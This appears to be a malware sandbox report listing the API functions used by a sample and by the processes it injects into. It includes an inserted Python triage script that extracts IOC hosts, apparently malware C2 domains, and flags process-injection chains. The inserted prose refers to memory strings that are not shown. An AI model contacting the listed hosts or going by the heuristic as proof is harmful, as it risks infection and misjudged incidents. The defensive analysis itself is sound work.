            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62BE0 NtQueryValueKey,LdrInitializeThunk, | 5_2_02E62BE0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 5_2_02E62BF0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62BA0 NtEnumerateValueKey,LdrInitializeThunk, | 5_2_02E62BA0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62B60 NtClose,LdrInitializeThunk, | 5_2_02E62B60
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62EE0 NtQueueApcThread,LdrInitializeThunk, | 5_2_02E62EE0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62E80 NtReadVirtualMemory,LdrInitializeThunk, | 5_2_02E62E80
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62FE0 NtCreateFile,LdrInitializeThunk, | 5_2_02E62FE0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62FB0 NtResumeThread,LdrInitializeThunk, | 5_2_02E62FB0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62F30 NtCreateSection,LdrInitializeThunk, | 5_2_02E62F30
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62CA0 NtQueryInformationToken,LdrInitializeThunk, | 5_2_02E62CA0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62C60 NtCreateKey,LdrInitializeThunk, | 5_2_02E62C60
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62C70 NtFreeVirtualMemory,LdrInitializeThunk, | 5_2_02E62C70
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62DF0 NtQuerySystemInformation,LdrInitializeThunk, | 5_2_02E62DF0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62DD0 NtDelayExecution,LdrInitializeThunk, | 5_2_02E62DD0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62D30 NtUnmapViewOfSection,LdrInitializeThunk, | 5_2_02E62D30
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62D10 NtMapViewOfSection,LdrInitializeThunk, | 5_2_02E62D10
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E635C0 NtCreateMutant,LdrInitializeThunk, | 5_2_02E635C0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E639B0 NtGetContextThread,LdrInitializeThunk, | 5_2_02E639B0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62AB0 NtWaitForSingleObject, | 5_2_02E62AB0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62B80 NtQueryInformationFile, | 5_2_02E62B80
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62EA0 NtAdjustPrivilegesToken, | 5_2_02E62EA0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62E30 NtWriteVirtualMemory, | 5_2_02E62E30
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62FA0 NtQuerySection, | 5_2_02E62FA0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62F90 NtProtectVirtualMemory, | 5_2_02E62F90
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62F60 NtCreateProcessEx, | 5_2_02E62F60
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62CF0 NtOpenProcess, | 5_2_02E62CF0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62CC0 NtQueryVirtualMemory, | 5_2_02E62CC0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62C00 NtQueryInformationProcess, | 5_2_02E62C00
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62DB0 NtEnumerateKey, | 5_2_02E62DB0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62D00 NtSetInformationFile, | 5_2_02E62D00
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E63090 NtSetValueKey, | 5_2_02E63090
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E63010 NtOpenDirectoryObject, | 5_2_02E63010
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E63D70 NtOpenThread, | 5_2_02E63D70
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E63D10 NtOpenProcessToken, | 5_2_02E63D10
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A8D80 NtCreateFile, | 5_2_006A8D80
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A8EF0 NtReadFile, | 5_2_006A8EF0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A8FE0 NtDeleteFile, | 5_2_006A8FE0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A9080 NtClose, | 5_2_006A9080
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_006A91E0 NtAllocateVirtualMemory, | 5_2_006A91E0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CEF0E9 NtQueryInformationProcess, | 5_2_02CEF0E9
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02CEFA38 NtSetContextThread, | 5_2_02CEFA38
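            The two parts of this listing a responder mines first are the memory strings above (the newdaydawning.net and polarmuseum.info URLs sitting among a crowd of browser search-engine defaults harvested from profiles) and the per-process Nt* function inventory that follows them. The script below is an added example, not Joe Sandbox code and not part of this report: it parses rows in the flattened shape they have here, separates attacker hosts from a small assumed allowlist of browser-default hosts, and flags a process whose resolved Nt* functions cover both a cross-process write (NtWriteVirtualMemory, NtMapViewOfSection) and a remote-execution primitive (NtQueueApcThread, NtSetContextThread, NtResumeThread, NtCreateThreadEx). The allowlist and the two API sets are analyst assumptions, not report data, and the sample rows are a constructed, abridged subset of the listing above.

```python
"""Parse Joe Sandbox-style "Source: ..." rows and pull out what a responder
needs first: network IOCs from memory strings, and a per-process inventory
of Nt* calls scored for a write-then-execute process-injection chain.

Added example; not Joe Sandbox code. The allowlist and the two API sets
are analyst-chosen assumptions, not report data.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Row shapes as they appear in the extracted report: the source column is
# fused to the description, and "Code function" rows end by repeating the
# function id (with or without API names in between).
STRING_ROW = re.compile(
    r"^Source: (?P<src>.+?)String found in binary or memory: (?P<val>\S+)"
)
CODE_ROW = re.compile(
    r"^Source: (?P<proc>.+?)Code function: "
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+):? ?(?P<apis>.*?),?(?P=fid)$"
)

# Assumed analyst allowlist: browser search-engine defaults that appear in
# memory when a stealer reads browser profiles, not attacker infrastructure.
BENIGN_HOSTS = {"duckduckgo.com", "ecosia.org", "yahoo.com", "google.com",
                "googleapis.com", "live.com"}

# Assumed heuristic: a process that both writes into another process and
# arranges execution there is performing injection.
WRITE_APIS = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
EXEC_APIS = {"NtQueueApcThread", "NtSetContextThread",
             "NtResumeThread", "NtCreateThreadEx"}

# Constructed sample: rows abridged from the listing in this report.
SAMPLE_ROWS = """
Source: RmClient.exe, 00000005.00000002.4591201110.0000000003804000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk
Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info
Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.polarmuseum.info/nuqv/
Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
Source: C:\\Windows\\SysWOW64\\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
Source: C:\\Windows\\SysWOW64\\RmClient.exeCode function: 5_2_006A8D80 NtCreateFile,5_2_006A8D80
Source: C:\\Windows\\SysWOW64\\RmClient.exeCode function: 5_2_006A9080 NtClose,5_2_006A9080
Source: C:\\Users\\user\\Desktop\\enkJ6J7dAn.exeCode function: 0_2_004096A00_2_004096A0
"""


def parse_rows(text):
    """Return ("string", source, value) and ("code", process, fid, [apis])
    tuples, one per recognised row; unrecognised lines are skipped."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        m = CODE_ROW.match(line)
        if m:
            apis = [a for a in m["apis"].split(",") if a]
            rows.append(("code", m["proc"], m["fid"], apis))
            continue
        m = STRING_ROW.match(line)
        if m:
            rows.append(("string", m["src"], m["val"]))
    return rows


def network_iocs(rows, allowlist=BENIGN_HOSTS):
    """Map each non-allowlisted host to the sorted URL paths seen for it."""
    hosts = defaultdict(set)
    for row in rows:
        if row[0] != "string":
            continue
        url = urlparse(row[2])
        host = (url.hostname or "").lower()
        if url.scheme not in ("http", "https") or not host:
            continue
        if any(host == h or host.endswith("." + h) for h in allowlist):
            continue
        hosts[host].add(url.path or "/")
    return {h: sorted(p) for h, p in sorted(hosts.items())}


def injection_profile(rows):
    """Per process: the Nt* APIs it resolves and whether they form a
    write + execute chain under the assumed heuristic."""
    per_proc = defaultdict(set)
    for row in rows:
        if row[0] == "code":
            per_proc[row[1]].update(a for a in row[3] if a.startswith("Nt"))
    profile = {}
    for proc, apis in per_proc.items():
        writes = sorted(apis & WRITE_APIS)
        execs = sorted(apis & EXEC_APIS)
        profile[proc] = {"nt_apis": sorted(apis), "writes": writes,
                         "execs": execs, "injection_chain": bool(writes and execs)}
    return profile


if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_ROWS)
    for host, paths in network_iocs(parsed).items():
        print(f"IOC host {host}: {paths}")
    for proc, info in injection_profile(parsed).items():
        verdict = "INJECTION CHAIN" if info["injection_chain"] else "no chain"
        print(f"{proc}: {verdict} writes={info['writes']} execs={info['execs']}")
```

            A static API inventory is a triage aid, not proof: the heuristic tells you which process to dump first (here svchost.exe, which resolves the write, map, APC and resume primitives), and the host list gives DNS and proxy logs something concrete to search for. Replace BENIGN_HOSTS with a real reputation feed before running this over anything but the sample rows.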
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, | 0_2_00431BE8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_00446313
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, | 0_2_004333BE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004096A0 | 0_2_004096A0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0042200C | 0_2_0042200C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0041A217 | 0_2_0041A217
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00412216 | 0_2_00412216
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0042435D | 0_2_0042435D
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004033C0 | 0_2_004033C0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044F430 | 0_2_0044F430
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004125E8 | 0_2_004125E8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044663B | 0_2_0044663B
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00413801 | 0_2_00413801
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0042096F | 0_2_0042096F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004129D0 | 0_2_004129D0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004119E3 | 0_2_004119E3
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0041C9AE | 0_2_0041C9AE
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0047EA6F | 0_2_0047EA6F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0040FA10 | 0_2_0040FA10
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044EB5F | 0_2_0044EB5F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00423C81 | 0_2_00423C81
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00411E78 | 0_2_00411E78
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00442E0C | 0_2_00442E0C
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00420EC0 | 0_2_00420EC0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044CF17 | 0_2_0044CF17
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00444FD2 | 0_2_00444FD2
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0420A648 | 0_2_0420A648
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004183F3 | 2_2_004183F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004030F0 | 2_2_004030F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401220 | 2_2_00401220
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EA23 | 2_2_0042EA23
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FC73 | 2_2_0040FC73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040256C | 2_2_0040256C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402510 | 2_2_00402510
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004165CE | 2_2_004165CE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004165D3 | 2_2_004165D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FE93 | 2_2_0040FE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DF13 | 2_2_0040DF13
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 | 2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 | 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037003E6 | 2_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 | 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C02C0 | 2_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C8158 | 2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630100 | 2_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 | 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F81CC | 2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F41A2 | 2_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037001AA | 2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 | 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 | 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664750 | 2_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C7C0 | 2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365C6E0 | 2_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640535 | 2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03700591 | 2_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F2446 | 2_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4420 | 2_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EE4F6 | 2_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 | 2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F6BD7 | 2_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 | 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 | 2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370A9A6 | 2_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364A840 | 2_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 | 2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E8F0 | 2_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036268B8 | 2_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B4F40 | 2_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03682F28 | 2_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660F30 | 2_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E2F30 | 2_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364CFE0 | 2_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632FC8 | 2_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BEFA0 | 2_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640E59 | 2_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEE26 | 2_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEEDB | 2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652E90 | 2_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FCE93 | 2_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364AD00 | 2_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DCD1F | 2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363ADE0 | 2_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03658DBF | 2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640C00 | 2_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630CF2 | 2_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0CB5 | 2_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362D34C | 2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F132D | 2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0368739A | 2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E12ED | 2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365B2C0 | 2_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036452A0 | 2_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367516C | 2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362F172 | 2_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B16B | 2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364B1B0 | 2_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F70E9 | 2_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF0E0 | 2_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EF0CC | 2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036470C0 | 2_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF7B0 | 2_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03685630 | 2_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F16CC | 2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7571 | 2_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037095C3 | 2_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DD5B0 | 2_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03631460 | 2_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FF43F | 2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFB76 | 2_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B5BF0 | 2_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367DBF9 | 2_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365FB80 | 2_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B3A6C | 2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFA49 | 2_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7A46 | 2_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EDAC6 | 2_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DDAAC | 2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03685AA0 | 2_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E1AA3 | 2_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03649950 | 2_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365B950 | 2_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D5910 | 2_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AD800 | 2_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036438E0 | 2_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFF09 | 2_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03603FD2 | 2_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03603FD5 | 2_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFFB1 | 2_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03641F92 | 2_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03649EB0 | 2_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F7D73 | 2_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03643D40 | 2_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F1D5A | 2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365FDC0 | 2_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B9C32 | 2_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FFCF2 | 2_2_036FFCF2
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029E7AFC | 3_2_029E7AFC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_02A068AC | 3_2_02A068AC
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029EE45C | 3_2_029EE45C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029EE457 | 3_2_029EE457
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029E5D9C | 3_2_029E5D9C
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Code function: 3_2_029E7D1C | 3_2_029E7D1C
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EB02C0 | 5_2_02EB02C0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02ED0274 | 5_2_02ED0274
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EF03E6 | 5_2_02EF03E6
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E3E3F0 | 5_2_02E3E3F0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EEA352 | 5_2_02EEA352
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EC2000 | 5_2_02EC2000
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EE81CC | 5_2_02EE81CC
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EF01AA | 5_2_02EF01AA
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EE41A2 | 5_2_02EE41A2
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EB8158 | 5_2_02EB8158
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E20100 | 5_2_02E20100
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02ECA118 | 5_2_02ECA118
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E4C6E0 | 5_2_02E4C6E0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E2C7C0 | 5_2_02E2C7C0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E30770 | 5_2_02E30770
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E54750 | 5_2_02E54750
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EDE4F6 | 5_2_02EDE4F6
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EE2446 | 5_2_02EE2446
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02ED4420 | 5_2_02ED4420
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EF0591 | 5_2_02EF0591
